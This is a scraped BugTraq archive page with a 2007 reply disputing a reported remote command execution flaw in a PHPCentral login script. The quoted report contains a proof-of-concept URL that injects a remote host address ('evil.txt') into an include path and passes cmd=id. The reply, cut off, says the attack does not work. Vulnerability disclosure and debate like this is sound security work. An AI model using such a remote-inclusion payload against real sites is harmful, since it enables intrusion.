BugTraq
Back to list
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
Re: PHPCentral Login Script Remote Command Execution Vulnerability
Aug 14 2007 08:16AM
Magnus Holmgren (holmgren lysator liu se)
On Sunday 12 August 2007 17:12, rizgar (at) linuxmail (dot) org [email concealed] wrote:
> include.php ;
>
> Lines 4 ;
>
> include("".$_SERVER[DOCUMENT_ROOT]."/$folder/config.php");
>
> PoC :
>
> http://www.example.com/include.php?_SERVER[DOCUMENT_ROOT]=http://evil.tx
t?&
>cmd=id
*Of course* this does not work. Setting register...
[ more ]
Privacy Statement
Copyright 2010, SecurityFocus
> include.php ;
>
> Lines 4 ;
>
> include("".$_SERVER[DOCUMENT_ROOT]."/$folder/config.php");
>
> PoC :
>
> http://www.example.com/include.php?_SERVER[DOCUMENT_ROOT]=http://evil.tx
t?&
>cmd=id
*Of course* this does not work. Setting register...
[ more ]